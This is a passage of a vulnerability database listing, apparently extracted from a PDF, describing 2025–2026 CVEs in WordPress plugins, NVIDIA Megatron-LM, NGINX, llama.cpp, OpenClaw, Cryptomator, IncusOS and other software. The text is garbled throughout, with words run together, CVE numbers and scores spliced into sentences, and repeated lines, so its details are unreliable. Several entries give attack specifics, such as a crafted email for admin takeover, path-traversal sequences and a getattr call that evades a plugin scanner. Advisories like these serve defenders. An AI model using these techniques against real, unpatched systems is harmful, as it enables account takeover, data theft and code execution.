8.1returningtheliteral`wildcard.Thiseffectivelygrantsanywebsitetheabilitytomakecredentialedcross-origin Details32610APIrequeststotheGlancesserver,enablingcross-sitedatatheftofsystemmonitoringinformation,configuration secrets,andcommandlineargumentsfromanyuserwhohasanactivebrowsersessionwithaGlancesinstance.

TheImportandexportusersandcustomerspluginforWordPressisvulnerabletoprivilegeescalationinall versionsupto,andincluding,1.29.7.Thisisduetothe'saveextrauserprofilefields'functionnotproperly CVE-restrictingwhichusermetakeyscanbeupdatedviaprofilefields.The'getrestrictedfields'methoddoesnot More2026-includesensitivemetakeyssuchas'wpcapabilities'.Thismakesitpossibleforunauthenticatedattackersto 8.1 Details3629escalatetheirprivilegestoAdministratorbysubmittingacraftedregistrationrequestthatsetsthe 'wpcapabilities'metakey.Thevulnerabilitycanonlybeexploitedifthe"Showfieldsinprofile"settingisenabled andaCSVwithawpcapabilitiescolumnheaderhasbeenpreviouslyimported. TheContestGallerypluginforWordPressisvulnerabletoanauthenticationbypassleadingtoadminaccount takeoverinallversionsupto,andincluding,28.1.5.Thisisduetotheemailconfirmationhandlerinusers- registry-check-after-email-or-pin-confirmation.phpusingtheuser'semailstringinaWHEREID=%sclause CVE-insteadofthenumericuserID,combinedwithanunauthenticatedkey-basedloginendpointinajax-functions- More2026-frontend.php.Whenthenon-defaultRegMailOptional=1settingisenabled,anattackercanregisterwitha 8.1 Details4021craftedemailstartingwiththetargetuserID(e.g.,1poc@example.test),triggertheconfirmationflowto overwritetheadmin's`useractivationkeyviaMySQLintegercoercion,andthenusethepostcg1lloginuserbykeyAJAXactiontoauthenticateastheadminwithoutanycredentials.Thismakesit possibleforunauthenticatedattackerstotakeoveranyWordPressadministratoraccountandgainfullsitecontrol. 
HTSlibisalibraryforreadingandwritingbioinformaticsfileformats.GZIfilesareusedtoindexblock-compressed GZIP[BGZF]files.IntheGZIloadingfunction,bgzfindexload_hfile(),itwaspossibletotriggeraninteger overflow,leadingtoanunder-orzero-sizedbufferbeingallocatedtostoretheindex.Sixteenzerobyteswould thenbewrittentothisbuffer,and,dependingontheresultoftheoverflowtherestofthefilemayalsobeloaded CVE-intothebufferaswell.Ifthefunctiondidattempttoloadthedata,itwouldeventuallyfailduetonotreadingthe More 2026- 8.1expectednumberofrecords,andthentrytofreetheoverflowedheapbuffer.Exploitingthisbugcausesaheap Details 31970bufferoverflow.Ifauseropensafilecraftedtoexploitthisissue,itcouldleadtotheprogramcrashing,or overwritingofdataandheapstructuresinwaysnotexpectedbytheprogram.Itmaybepossibletousethisto obtainarbitrarycodeexecution.Versions1.23.1,1.22.2and1.21.1includefixesforthisissue.Theeasiestwork- aroundistodiscardany.gziindexfilesfromuntrustedsources,andusethebgzip-r`optiontorecreatethem.

OneUptimeisasolutionformonitoringandmanagingonlineservices.Priortoversion10.0.34,thefixforCVE- 2026-32306(ClickHouseSQLinjectionviaaggregatequeryparameters)addedcolumnnamevalidationtothe 2026-32306(ClickHouseSQLinjectionviaaggregatequeryparameters)addedcolumnnamevalidationtothe aggregateBymethodbutdidnotapplythesamevalidationtothreeotherqueryconstructionpathsinCVE- MoreStatementGenerator.ThetoSortStatement,toSelectStatement,andtoGroupByStatementmethodsacceptuser- 8.1 DetailscontrolledobjectkeysfromAPIrequestbodiesandinterpolatethemasClickHouseIdentifierparameterswithout33142 verifyingtheycorrespondtoactualmodelcolumns.ClickHouseIdentifierparametersaresubstituteddirectlyinto querieswithoutescaping,soanattackerwhocanreachanyanalyticslistoraggregateendpointcaninject arbitrarySQLthroughcraftedsort,select,orgroupBykeys.Thisissuehasbeenpatchedinversion10.0.34. CVE-LibreChatversion0.8.1-rc2usesthesameJWTsecretfortheusersessionmechanismandRAGAPIwhich More2025- 8.0compromisestheservice-levelauthenticationoftheRAGAPI. 
Details41258 Admidioisanopen-sourceusermanagementsolution.Versions5.0.6andbelowarevulnerabletoarbitrarySQL InjectionthroughtheMyListconfigurationfeature.TheMyListconfigurationfeatureletsauthenticatedusersdefine customlistcolumnlayouts,storinguser-suppliedcolumnnames,sortdirections,andfilterconditionsintheCVE-admlistcolumnstableviapreparedstatements.However,thesestoredvaluesarelaterreadbackand More2026- 8.0interpolateddirectlyintodynamicallyconstructedSQLquerieswithoutsanitizationorparameterization,creatinga Details32813classicsecond-orderSQLinjectionvulnerability(safewrite,unsaferead).Anattackercanexploitthistoinject arbitrarySQL,potentiallyreading,modifying,ordeletinganydatainthedatabaseandachievingfulldatabase compromise.Thisissuehasbeenfixedinversion5.0.7. OpenClawversionspriorto2026.2.26containametadataspoofingvulnerabilitywherereconnectplatformandCVE-deviceFamilyfieldsareacceptedfromtheclientwithoutbeingboundintothedevice-authsignature.Anattacker More2026- 8.0withapairednodeidentityonthetrustednetworkcanspoofreconnectmetadatatobypassplatform-basednode Details32014commandpoliciesandgainaccesstorestrictedcommands. MuraCMSthrough10.1.10containsaCSRFvulnerabilityintheAddToGroupfunctionalityforusermanagement (cUsers.cfcaddToGroupmethod)thatallowsattackerstoescalateprivilegesbyaddinganyusertoanygroup withoutproperauthorizationchecks.ThevulnerablefunctionlacksCSRFtokenvalidationanddirectlyprocessesCVE-user-supplieduserIdandgroupIdparametersviagetUserManager().createUserInGorup(),enablingmalicious More2025- 8.0websitestoforgerequeststhatautomaticallyexecutewhenanauthenticatedadministratorvisitsacraftedpage. 
Details55041AddingausertotheSuperAdminsgroup(s2user)isnotpossible.Successfulexploitationresultsintheattacker gainingprivilegeescalationbothhorizontallytoothergroupsandverticallytotheadmingroup.Escalationtothe s2Usergroupisnotpossible. CVE-The"PrivilegedHelper"componentoftheArturiaSoftwareCenter(MacOS)doesnotperformsufficientclientcode More2026-signaturevalidationwhenaclientconnects.Thisleadstoanattackerbeingabletoconnecttothehelperand 7.8 Details24062executeprivilegedactionsleadingtolocalprivilegeescalation. CVE- More2025-AWStats8.0isvulnerabletoCommandInjectionviatheopenfunction 7.8 Details63261 CVE-NVIDIAModelOptimizerforWindowsandLinuxcontainsavulnerabilityintheONNXquantizationfeature,wherea More2026-usercouldcauseunsafedeserializationbyprovidingaspeciallycraftedinputfile.Asuccessfulexploitofthis 7.8 Details24141vulnerabilitymightleadtocodeexecution,escalationofprivileges,datatampering,andinformationdisclosure. NGINXOpenSourceandNGINXPlushaveavulnerabilityinthengxhttpmp4modulemodule,whichmightallow anattackertotriggerabufferover-readorover-writetotheNGINXworkermemoryresultinginitsterminationor CVE-possiblycodeexecution,usingaspeciallycraftedMP4file.ThisissueaffectsNGINXOpenSourceandNGINXPlus More2026-ifitisbuiltwiththengxhttpmp4modulemoduleandthemp4directiveisusedintheconfigurationfile. 7.8 Details32647Additionally,theattackispossibleonlyifanattackercantriggertheprocessingofaspeciallycraftedMP4filewith thengxhttpmp4modulemodule.Note:SoftwareversionswhichhavereachedEndofTechnicalSupport(EoTS) arenotevaluated. 
CVE-NVIDIAMegatron-LMcontainsavulnerabilityinthehybridconversionscriptwhereanAttackermaycauseanRCE More2025-byconvincingausertoloadamaliciouslycraftedfile.Asuccessfulexploitofthisvulnerabilitymayleadtocode 7.8 Details33248execution,escalationofprivileges,informationdisclosure,anddatatampering. CVE-NVIDIAMegatron-LMcontainsavulnerabilityininferencingwhereanAttackermaycauseanRCEbyconvincinga More2026-usertoloadamaliciouslycraftedinput.Asuccessfulexploitofthisvulnerabilitymayleadtocodeexecution, 7.8 Details24151escalationofprivileges,informationdisclosure,anddatatampering. CVE-NVIDIAMegatron-LMcontainsavulnerabilityincheckpointloadingwhereanAttackermaycauseanRCEby More2026-convincingausertoloadamaliciouslycraftedfile.Asuccessfulexploitofthisvulnerabilitymayleadtocode 7.8 Details24152execution,escalationofprivileges,informationdisclosure,anddatatampering. CVE-NVIDIANeMoFrameworkcontainsavulnerabilityincheckpointloadingwhereanattackercouldcauseremote More2026-codeexecution.Asuccessfulexploitofthisvulnerabilitymightleadtocodeexecution,escalationofprivileges, 7.8 Details24157informationdisclosureanddatatampering. CVE-ImproperRestrictionofOperationswithintheBoundsofaMemoryBuffervulnerabilityinlinkingvision More 7.8rapidvms.Thisissueaffectsrapidvms:beforePR#96. Details33847 TheIntelEPTpagingcodeusesanoptimizationtodeferflushingofanycachedEPTstateuntilthep2mlockis

CVE- dropped,sothatmultiplemodificationsdoneunderthesamelockedregiononlyissueasingleflush.Freeingof More pagingstructureshoweverisnotdeferreduntiltheflushingisdone,andcanresultinfreedpagestransiently 7.8 Details23554 beingpresentincachedstate.Suchstaleentriescanpointtomemoryrangesnotownedbytheguest,thus allowingaccesstounintendedmemoryregions. CVE- More2026- Out-of-boundsWritevulnerabilityinWujekFoliarzDualSenseY-v2.ThisissueaffectsDualSenseY-v2:before54. 7.8 Details33850 CVE- NVIDIANeMoFrameworkcontainsavulnerabilitywhereanattackermaycauseremotecodeexecution.A More2026- successfulexploitofthisvulnerabilitymightleadtocodeexecution,escalationofprivileges,information 7.8 Details24159 disclosureanddatatampering. CVE- ImproperRestrictionofOperationswithintheBoundsofaMemoryBuffervulnerabilityinjoncampbell123 More2026- 7.8 doslib.Thisissueaffectsdoslib:beforedoslib-20250729. Details33851 The32-bitimplementationofNGINXOpenSourcehasavulnerabilityinthengxhttpmp4modulemodule,which mightallowanattackertoover-readorover-writeNGINXworkermemoryresultinginitstermination,usinga CVE- speciallycraftedMP4file.Theissueonlyaffects32-bitNGINXOpenSourceifitisbuiltwiththe More2026- ngxhttpmp4modulemoduleandthemp4directiveisusedintheconfigurationfile.Additionally,theattackis 7.8 Details27784 possibleonlyifanattackercantriggertheprocessingofaspeciallycraftedMP4filewiththe ngxhttpmp4modulemodule.Note:SoftwareversionswhichhavereachedEndofTechnicalSupport(EoTS)are notevaluated. 
CVE- NVIDIAMegatron-LMcontainsavulnerabilityincheckpointloadingwhereanAttackermaycauseanRCEby More2026- convincingausertoloadamaliciouslycraftedfile.Asuccessfulexploitofthisvulnerabilitymayleadtocode 7.8 Details24150 execution,escalationofprivileges,informationdisclosure,anddatatampering. CVE- Out-of-boundsWritevulnerabilityinMolotovCherryAndroid-ImageMagick7.ThisissueaffectsAndroid- More2026- 7.8 ImageMagick7:before7.1.2-11. Details4756 llama.cppisaninferenceofseveralLLMmodelsinC/C++.Priortob7824,anintegeroverflowvulnerabilityinthe `ggmlnbytesfunctionallowsanattackertobypassmemoryvalidationbycraftingaGGUFfilewithspecificCVE- tensordimensions.Thiscausesggmlnbytes`toreturnasignificantlysmallersizethanrequired(e.g.,4MB More2026- 7.8 insteadofExabytes),leadingtoaheap-basedbufferoverflowwhentheapplicationsubsequentlyprocessesthe Details33298 tensor.ThisvulnerabilityallowspotentialRemoteCodeExecution(RCE)viamemorycorruption.b7824containsa fix. OpenWrtProjectisaLinuxoperatingsystemtargetingembeddeddevices.Inversionspriorto24.10.6,a vulnerabilityinthehotplugcallfunctionallowsanattackertobypassenvironmentvariablefilteringandinjectan arbitraryPATHvariable,potentiallyleadingtoprivilegeescalation.ThefunctionisintendedtofilteroutsensitiveCVE- environmentvariableslikePATHwhenexecutinghotplugscriptsin/etc/hotplug.d,butabugusingstrcmpinstead More2026- 7.8 ofstrncmpcausesthefiltertocomparethefullenvironmentstring(e.g.,PATH=/some/value)againsttheliteral Details30874 "PATH",sothematchalwaysfails.Asaresult,thePATHvariableisneverexcluded,enablinganattackertocontrol whichbinariesareexecutedbyprocd-invokedscriptsrunningwithelevatedprivileges.Thisissuehasbeenfixedin version24.10.6. 
pydicomisapurePythonpackageforworkingwithDICOMfiles.Versions2.0.0-rc.1through3.0.1arevulnerable toPathTraversalthroughamaliciouslycraftedDICOMDIRReferencedFileIDwhenitissettoapathoutsidetheCVE- File-setroot.pydicomresolvesthepathonlytoconfirmthatitexists,butdoesnotverifythattheresolvedpath More2026- 7.8 remainsundertheFile-setroot.SubsequentpublicFileSetoperationssuchascopy(),write(),and Details32711 remove()+write(useexisting=True)usethatuncheckedpathinfileI/Ooperations.Thisallowsarbitraryfile read/copyand,insomeflows,move/deleteoutsidetheFile-setroot.Thisissuehasbeenfixedinversion3.0.2. libfuseisthereferenceimplementationoftheLinuxFUSE.Fromversion3.18.0tobeforeversion3.18.2,ause- after-freevulnerabilityintheiouringsubsystemoflibfuseallowsalocalattackertocrashFUSEfilesystem CVE- processesandpotentiallyexecutearbitrarycode.Wheniouringthreadcreationfailsduetoresourceexhaustion More2026- (e.g.,cgrouppids.max),fuseuring_start()freestheringpoolstructurebutstoresthedanglingpointerinthe 7.8 Details33150 sessionstate,leadingtoause-after-freewhenthesessionshutsdown.Thetriggerisreliableincontainerized environmentswherecgrouppids.maxlimitsnaturallyconstrainthreadcreation.Thisissuehasbeenpatchedin version3.18.2. RequiresmalwarecodetomisusetheDDKkernelmoduleIOCTLinterface.SuchcodecanusetheinterfaceinanCVE- unsupportedwaythatallowssubversionoftheGPUtoperformwritestoarbitraryphysicalmemorypages.The More2026- 7.8 productutilisesasharedresourceinaconcurrentmannerbutdoesnotattempttosynchroniseaccesstothe Details22163 resource. 
ScreenToGifisascreenrecordingtool.Inversionsfrom2.42.1andprior,ScreenToGifisvulnerabletoDLL CVE- sideloadingviaversion.dll.Whentheportableexecutableisrunfromauser-writabledirectory,itloadsversion.dll More fromtheapplicationdirectoryinsteadoftheWindowsSystem32directory,allowingarbitrarycodeexecutioninthe 7.8 Details33156 user'scontext.ThisisespeciallyimpactfulbecauseScreenToGifisprimarilydistributedasaportableapplication intendedtoberunfromuser-writablelocations.Attimeofpublication,therearenopubliclyavailablepatches.

PySpectorisastaticanalysissecuritytesting(SAST)FrameworkengineeredformodernPythondevelopment workflows.PySpectorversions0.1.6andpriorareaffectedbyasecurityvalidationbypassinthepluginsystem. Thevalidateplugincode()functioninpluginsystem.py,performsstaticASTanalysistoblockdangerousAPIcallsCVE-beforeapluginistrustedandexecuted.However,theinternalresolvename()helperonlyhandlesast.Nameand More 7.8ast.Attributenodetypes,returningNoneforallothers.Whenapluginusesindirectfunctioncallsviagetattr() Details33139(suchasgetattr(os,'system'))theoutercall'sfuncnodeisoftypeast.Call,causingresolvename()toreturnNone, andthesecuritychecktobesilentlyskipped.Thepluginincorrectlypassesthetrustworkflow,andexecutes arbitrarysystemcommandsontheuser'smachinewhenloaded.Thisissuehasbeenpatchedinversion0.1.7. Aflawwasfoundinthelibtifflibrary.AremoteattackercouldexploitasignedintegeroverflowvulnerabilityintheCVE-putcontig8bitYCbCr44tilefunctionbyprovidingaspeciallycraftedTIFFfile.Thisflawcanleadtoanout-of-bounds More2026- 7.8heapwriteduetoincorrectmemorypointercalculations,potentiallycausingadenialofservice(applicationcrash) Details4775orarbitrarycodeexecution. AdminExpress1.2.5.485containsalocalstructuredexceptionhandlingbufferoverflowvulnerabilitythatallows CVE-localattackerstoexecutearbitrarycodebysupplyinganalphanumericencodedpayloadintheFolderPathfield. More2019-AttackerscantriggerthevulnerabilitythroughtheSystemComparefeaturebypastingacraftedbufferoverflow 7.8 Details25612payloadintotheleft-handsideFolderPathfieldandclickingthescaleicontoexecuteshellcodewithapplication privileges. 
CVE-NVIDIAMegatronLMcontainsavulnerabilityinquantizationconfigurationloading,whichcouldallowremotecode More2025-execution.Asuccessfulexploitofthisvulnerabilitymightleadtocodeexecution,escalationofprivileges, 7.8 Details33247informationdisclosure,anddatatampering. OpenClawversionspriorto2026.2.21sandboxbrowserentrypointlaunchesx11vncwithoutauthenticationforCVE-noVNCobserversessions,allowingunauthenticatedaccesstotheVNCinterface.Remoteattackersonthehost More2026- 7.7loopbackinterfacecanconnecttotheexposednoVNCporttoobserveorinteractwiththesandboxbrowser Details32064withoutcredentials. CVE-AnAuthenticatedNoSQLInjectionvulnerabilityfoundinUniFiNetworkApplicationcouldallowamaliciousactor More2026- 7.7withauthenticatedaccesstothenetworktoescalateprivileges. Details22558 CVE-Undercertainconditions,anattackercouldbindtothesameportusedbyWebCTRL.Thiscouldallowtheattacker More2026-tocraftandsendmaliciouspacketsandimpersonatetheWebCTRLservicewithoutrequiringcodeinjectioninto 7.7 Details25086theWebCTRLsoftware. AflawwasfoundinKeycloak.Keycloak'sSecurityAssertionMarkupLanguage(SAML)brokerendpointdoesnotCVE-properlyvalidateencryptedassertionswhentheoverallSAMLresponseisnotsigned.Anattackerwithavalid More2026- 7.7signedSAMLassertioncanexploitthisbycraftingamaliciousSAMLresponse.Thisallowstheattackertoinjectan Details2092encryptedassertionforanarbitraryprincipal,leadingtounauthorizedaccessandpotentialinformationdisclosure. 
Cockpitisaheadlesscontentmanagementsystem.AnyCockpitCMSinstancerunningversion2.13.4orearlier withAPIaccessenabledispotentiallyaffectedbyaaSQLInjectionvulnerabilityintheMongoLiteAggregation Optimizer.Anydeploymentwherethe/api/content/aggregate/{model}endpointispubliclyaccessibleor reachablebyuntrustedusersmaybevulnerable,andattackersinpossessionofavalidread-onlyAPIkey(theCVE-lowestprivilegelevel)canexploitthisvulnerability—noadminaccessisrequired.Anattackercaninjectarbitrary More2026- 7.7SQLviaunsanitizedfieldnamesinaggregationqueries,bypassthe`state=1published-contentfiltertoaccess Details31891unpublishedorrestrictedcontent,andextractunauthorizeddatafromtheunderlyingSQLitecontentdatabase. Thisvulnerabilityhasbeenpatchedinversion2.13.5.Thefixappliesthesamefield-namesanitizationintroduced inv2.13.3fortoJsonPath()tothetoJsonExtractRaw()methodinlib/MongoLite/Aggregation/Optimizer.php, closingtheinjectionvectorintheAggregationOptimizer. Wallosisanopen-source,self-hostablepersonalsubscriptiontracker.Priortoversion4.7.0,theSSRFfixappliedin version4.6.2forCVE-2026-30839andCVE-2026-30840isincomplete.Thevalidate_webhook_url_for_ssrf()CVE-protectionwasaddedtothetest*notificationendpointsbutnottothecorrespondingsave*endpoints.An More2026- 7.7authenticatedusercansaveaninternal/privateIPaddressasanotificationURL,andwhenthecronjob Details33399sendnotifications.phpexecutes,therequestissenttotheinternalIPwithoutanySSRFvalidation.Thisissuehas beenpatchedinversion4.7.0. 
CVE-AStoredcross-sitescripting(XSS)vulnerabilityaffectsHCLUnicaMarketingOperationsv12.1.8andlower.Stored More2024-cross-sitescripting(alsoknownassecond-orderorpersistentXSS)ariseswhenanapplicationreceivesdatafrom 7.6 Details42210anuntrustedsourceandincludesthatdatawithinitslaterHTTPresponsesinanunsafeway. WWBNAVideoisanopensourcevideoplatform.Inversionsuptoandincluding26.0,POST /objects/aVideoEncoder.json.phpacceptsarequester-controlledchunkFileparameterintendedforstaged uploadchunks.Insteadofrestrictingthatpathtotrustedserver-generatedchunklocations,theendpointaccepts CVE-arbitrarylocalfilesystempathsthatpassisValidURLOrPath().Thathelperallowsfilesunderbroadserver More2026- 7.6directoriesincluding/var/www/,theapplicationroot,cache,tmp,andvideos,onlyrejecting.php`files.Foran Details33354authenticateduploadereditingtheirownvideo,thisbecomesanarbitrarylocalfileread.Theendpointcopiesthe attacker-chosenlocalfileintotheattacker'spublicvideostoragepath,afterwhichitcanbedownloadedover HTTP.Commit59bbd601a3f65a5b18c1d9e4eb11471c0a59214fcontainsapatchfortheissue. 
Cryptomatorencryptsdatabeingstoredoncloudinfrastructure.Priortoversion1.19.1,anintegritycheck vulnerabilityallowsanattackertotamperwiththevaultconfigurationfileleadingtoaman-in-the-middle vulnerabilityallowsanattackertotamperwiththevaultconfigurationfileleadingtoaman-in-the-middle CVE-vulnerabilityinHubkeyloadingmechanism.Beforethisfix,theclienttrustedendpointsfromthevaultconfig Morewithouthostauthenticitychecks,whichcouldallowtokenexfiltrationbymixingalegitimateauthendpointwitha 7.6 Details32303maliciousAPIendpoint.ImpactedareusersunlockingHub-backedvaultswithaffectedclientversionsin environmentswhereanattackercanalterthevault.cryptomatorfile.Thisissuehasbeenpatchedinversion 1.19.1. CVE-AnauthorizationbypassvulnerabilityintheVaultsecretsback-endimplementationofJujuversions3.1.6through More2026-3.6.18allowsanauthenticatedunitagenttoperformunauthorizedupdatestosecretrevisions.Withsufficient 7.6 Details32692information,anattackercanpoisonanyexistingsecretrevisionwithinthescopeofthatVaultsecretback-end.

CVE- to8.0.0.2,userswiththeNotes-myencountersrolecanfillEyeExamformsinpatientencounters.Theanswers More2026- totheformcanbeprintedoutinPDFform.AnOut-of-BandServer-SideRequestForgery(OOBSSRF)vulnerability 7.6 Details33321 wasidentifiedinthePDFcreationfunctionwheretheformanswersareparsedasunescapedHTML,allowingan attackertoforgerequestsfromtheservermadetoexternalorinternalresources.Version8.0.0.2fixestheissue. IncusOSisanimmutableOSimagededicatedtorunningIncus.Priorto202603142010,thedefaultconfiguration ofsystemd-cryptenrollasusedbyIncusOSthroughmkosiallowsforanattackerwithphysicalaccesstothe machinetoaccesstheencrypteddatawithoutrequiringanyinteractionbythesystem'sowneroranytampering ofSecureBootstateorkernel(UKI)bootimage.That'sbecauseinthisconfiguration,theLUKSkeyismade availablebytheTPMsolongasthesystemhastheexpectedPCR7valueandthePCR11policymatches.That defaultPCR11policyimportantlyallowsfortheTPMtoreleasethekeytothebootedsystemratherthanjustfrom theinitrdpartofthesignedkernelimage(UKI).Theattackreliesontheattackerbeingabletosubstitutethe originalencryptedrootpartitionforonethattheycontrol.Bydoingso,thesystemwillpromptforarecoverykey onboot,whichtheattackerhasdefinedandcanprovide,beforebootingthesystemusingtheattacker'sroot partitionratherthanthesystem'soriginalone.Theattackeronlyneedstoputasystemdunitstartingonsystem bootwithintheirrootpartitiontohavethesystemrunthatlogiconboot.Thatunitwillthenruninanenvironment CVE- wheretheTPMwillallowfortheretrievaloftheencryptionkeyoftherealrootdisk,allowingtheattackertosteal More2026- theLUKSvolumekey(immutablemasterkey)andthenuseitagainsttherealrootdisk,alteringitorgettingdata 7.6 Details32606 
outbeforeputtingthediskbackthewayitwasandreturningthesystemwithoutatraceofthisattackhaving happened.ThisisallpossiblebecausethesystemwillhavestillbootedwithSecureBootenabled,willhave measuredandrantheexpectedbootloaderandkernelimage(UKI).TheinitrdselectstherootdiskbasedonGPT partitionidentifiersmakingitpossibletoeasilysubstitutetherealrootdiskforanattackercontrolledone.This doesn'tleadtoanychangeintheTPMstateandthereforeallowsforretrievaloftheLUKSkeybytheattacker throughaboottimesystemdunitontheiralternativerootpartition.IncusOSversion202603142010(2026/03/14 20:10UTC)includesthenewPCR15logicandwillautomaticallyupdatetheTPMpolicyonboot.Anyonesuspecting thattheirsystemmayhavebeenphysicallyaccessedwhileshutdownshouldperformafullsystemwipeand reinstallationasonlythatwillrotatetheLUKSvolumekeyandpreventsubsequentaccesstotheencrypteddata shouldthesystemhavebeenpreviouslycompromised.Therearenoknownworkaroundsotherthanupdatingtoa versionwithcorrectedlogicwhichwillautomaticallyrebindtheLUKSkeystothenewsetofTPMregistersand preventthisfrombeingexploited. 
WWBNAVideoisanopensourcevideoplatform.Inversionsuptoandincluding26.0,auserwiththe"Videos Moderator"permissioncanescalateprivilegestoperformfullvideomanagementoperations—including CVE- ownershiptransferanddeletionofanyvideo—despitethepermissionbeingdocumentedasonlyallowingvideo More2026- publicitychanges(Active,Inactive,Unlisted).TherootcauseisthatPermissions::canModerateVideos()isused 7.6 Details33650 asanauthorizationgateforfullvideoeditinginvideoAddNew.json.php,whilevideoDelete.json.phponly checksownership,creatinganasymmetricauthorizationboundaryexploitableviaatwo-stepownership-transfer- then-deletechain.Commit838e16818c793779406ecbf34ebaeba9830e33f8containsapatch. CryptomatorforAndroidoffersmulti-platformtransparentclient-sideencryptionforfilesinthecloud.Priorto version1.12.3,anintegritycheckvulnerabilityallowsanattackertamperwiththevaultconfigurationfileleading CVE- toaman-in-the-middlevulnerabilityinHubkeyloadingmechanism.Beforethisfix,theclienttrustedendpoints More2026- fromthevaultconfigwithouthostauthenticitychecks,whichcouldallowtokenexfiltrationbymixingalegitimate 7.6 Details32317 authendpointwithamaliciousAPIendpoint.ImpactedareusersunlockingHub-backedvaultswithaffectedclient versionsinenvironmentswhereanattackercanalterthevault.cryptomatorfile.Thisissuehasbeenpatchedin version1.12.3.

9.6.0-alpha.15and8.6.41,anattackerwhoisallowedtouploadfilescanbypassthefileextensionfilterby appendingaMIMEparameter(e.g.;charset=utf-8)totheContent-Typeheader.Thiscausestheextension validationtofailmatchingagainsttheblocklist,allowingactivecontenttobestoredandservedunderthe application'sdomain.Inaddition,certainXML-basedfileextensionsthatcanrenderscriptsinwebbrowsersare notincludedinthedefaultblocklist.ThiscanleadtostoredXSSattacks,compromisingsessiontokens,user credentials,orothersensitivedataaccessibleviathebrowser'slocalstorage.Thefixinversions9.6.0-alpha.15 and8.6.41stripsMIMEparametersfromtheContent-TypeheaderbeforevalidatingthefileextensionagainstCVE- Moretheblocklist.ThedefaultblocklisthasalsobeenextendedtoincludeadditionalXML-basedextensions(xsd,2026- 7.6 Detailsrng,rdf,rdf+xml,owl,mathml,mathml+xml)thatcanrenderactivecontentinwebbrowsers.Note32728 thatthefileUpload.fileExtensionsoptionisintendedtobeconfiguredasanallowlistoffileextensionsthatare validforaspecificapplication,notasadenylist.Thedefaultdenylistisprovidedonlyasabasicdefaultthat coversmostcommonproblematicextensions.Itisnotintendedtobeanexhaustivelistofallpotentially dangerousextensions.Developersshouldnotrelyonthedefaultvalue,asnewextensionsthatcanrenderactive contentinbrowsersmightemergeinthefuture.Asaworkaround,configurethefileUpload.fileExtensionsoption contentinbrowsersmightemergeinthefuture.Asaworkaround,configurethefileUpload.fileExtensionsoption touseanallowlistofonlythefileextensionsthatyourapplicationneeds,ratherthanrelyingonthedefault blocklist. 
SiYuanisapersonalknowledgemanagementsystem.Inversions3.6.0andbelow,POST/api/import/importSYand POST/api/import/importZipMdwriteuploadedarchivestoapathderivedfromthemultipartfilenamefieldwithoutCVE-sanitization,allowinganadmintowritefilestoarbitrarylocationsoutsidethetempdirectory-includingsystem More2026- 7.6pathsthatenableRCE.Thiscanleadtoaatadestructionbyoverwritingworkspaceorapplicationfiles,andfor Details32749Dockercontainersrunningasroot(commondefault),thisgrantsfullcontainercompromise.Thisissuehasbeen fixedinversion3.6.1. CryptomatorforIOSoffersmulti-platformtransparentclient-sideencryptionforfilesinthecloud.Priortoversion 2.8.3,anintegritycheckvulnerabilityallowsanattackertamperwiththevaultconfigurationfileleadingtoaman- CVE-in-the-middlevulnerabilityinHubkeyloadingmechanism.Beforethisfix,theclienttrustedendpointsfromthe More2026-vaultconfigwithouthostauthenticitychecks,whichcouldallowtokenexfiltrationbymixingalegitimateauth 7.6 Details32318endpointwithamaliciousAPIendpoint.ImpactedareusersunlockingHub-backedvaultswithaffectedclient versionsinenvironmentswhereanattackercanalterthevault.cryptomatorfile.Thisissuehasbeenpatchedin version2.8.3. OpenClawversionspriorto2026.2.26containapathtraversalvulnerabilityinworkspaceboundaryvalidationthatCVE-allowsattackerstowritefilesoutsidetheworkspacethroughin-workspacesymlinkspointingtonon-existentout- More2026- 7.6of-roottargets.Thevulnerabilityexistsbecausetheboundarycheckimproperlyresolvesaliases,permittingthe Details32055firstwriteoperationtoescapetheworkspaceboundaryandcreatefilesinarbitrarylocations. 
CVE-LyricVideoCreator2.1containsadenialofservicevulnerabilitythatallowsattackerstocrashtheapplicationby More2019-processingmalformedMP3files.AttackerscancreateacraftedMP3filewithanoversizedbufferandtriggerthe 7.5 Details25560crashbyopeningthefilethroughtheBrowsesongfunctionality. WebCTRLsystemsthatcommunicateoverBACnetinherittheprotocol'slackofnetworklayerauthentication.CVE-WebCTRLdoesnotimplementadditionalvalidationofBACnettrafficsoanattackerwithnetworkaccesscould More2026- 7.5spoofBACnetpacketsdirectedateithertheWebCTRLserverorassociatedAutomatedLogiccontrollers.Spoofed Details32666packetsmaybeprocessedaslegitimate. TheJetFormBuilderpluginforWordPressisvulnerabletoarbitraryfilereadviapathtraversalinallversionsupto, andincluding,3.5.6.2.Thisisduetothe'UploadedFile::setfromarray'methodacceptinguser-suppliedfilepaths CVE-fromtheMediaFieldpresetJSONpayloadwithoutvalidatingthatthepathbelongstotheWordPressuploads More2026-directory.Combinedwithaninsufficientsame-filecheckin'FileTools::issamefile'thatonlycompares 7.5 Details4373basenames,thismakesitpossibleforunauthenticatedattackerstoexfiltratearbitrarylocalfilesasemail attachmentsbysubmittingacraftedformrequestwhentheformisconfiguredwithaMediaFieldandaSend Emailactionwithfileattachment. phpTransformer2016.9containsadirectorytraversalvulnerabilitythatallowsunauthenticatedattackerstoCVE-accessarbitraryfilesbymanipulatingthepathparameter.Attackerscansendrequeststothe More2019- 7.5jQueryFileUploadmasterserverendpointwithtraversalsequences../../../../../../tolistandretrievefilesoutsidethe Details25579intendeddirectory. 
OpenClawversionspriorto2026.2.22failtosanitizeshellstartupenvironmentvariablesHOMEandZDOTDIRinCVE-thesystem.runfunction,allowingattackerstobypasscommandallowlistprotections.Remoteattackerscaninject More2026- 7.5maliciousstartupfilessuchas.bashprofileor.zshenvtoachievearbitrarycodeexecutionbeforeallowlist- Details32056evaluatedcommandsareexecuted. OpenClawversionspriorto2026.2.25containanauthenticationhardeninggapinbrowser-originWebSocketCVE-clientsthatallowsattackerstobypassoriginchecksandauththrottlingonloopbackdeployments.Anattackercan More2026- 7.5trickauserintoopeningamaliciouswebpageandperformpasswordbrute-forceattacksagainstthegatewayto Details32025establishanauthenticatedoperatorsessionandinvokecontrol-planemethods. CVE-CEWEPHOTOSHOW6.4.3containsadenialofservicevulnerabilitythatallowsattackerstocrashtheapplication More2019-bysubmittinganexcessivelylongbuffertothepasswordfield.Attackerscanpastealargestringofrepeated 7.5 Details25552charactersintothepasswordinputduringtheuploadprocesstotriggeranapplicationcrash. TheQuentnWPpluginforWordPressisvulnerabletoSQLInjectionviathe'qntnwpaccess'cookieinallversions CVE-upto,andincluding,1.2.12.Thisisduetoinsufficientescapingontheusersuppliedparameterandlackof More2026-sufficientpreparationontheexistingSQLqueryinthe`getuseraccess()`method.Thismakesitpossiblefor 7.5 